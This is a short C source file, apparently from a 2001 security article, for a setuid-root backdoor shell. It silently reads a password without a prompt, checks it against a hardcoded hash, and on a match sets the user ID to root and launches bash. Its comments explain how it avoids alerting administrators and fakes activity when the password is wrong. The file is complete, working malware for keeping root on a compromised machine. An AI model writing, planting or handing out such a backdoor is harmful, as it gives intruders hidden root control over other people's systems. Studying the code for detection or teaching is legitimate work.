(view this code in a separate window)

/*
 * suidshell.c
 *
 * Compile with
 *      gcc -o suidshell suidshell.c -lcrypt
 *
 * Install setuserid root, run, and viola.
 * Not terribly impressive, and guarenteed to
 * be noticed by any sysadmin worth her salt.
 *
 * Copyright 2001, Bri Hatch
 * Released under the GPL.  See COPYING file
 * for more information.
 */

#include <stdio.h>
#include <unistd.h>
#define _XOPEN_SOURCE

int main() {
      char passwd[BUFSIZ];
      char encrypted[] = "00frf5lpj6212";

      /* Let's require that folks supply a password, just
       * to be sure any other users on this system can't
       * use this shell on their own. Last thing a hacker
       * needs on a compromised system is another hacker
       * goofing things up. No, we don't prompt for it -
       * that'd set off an administrator for sure...
       */
      system("/bin/stty -echo");
      read(0, passwd, BUFSIZ-1);
      system("/bin/stty echo");

      if ( strcmp( crypt(passwd, encrypted), encrypted) == 0 ) {
            setreuid(0,0);	/* make real and effective userid root */
            system("/bin/bash");
      } else {
            sleep(200);	/* make it look like we're doing something... */
      }
}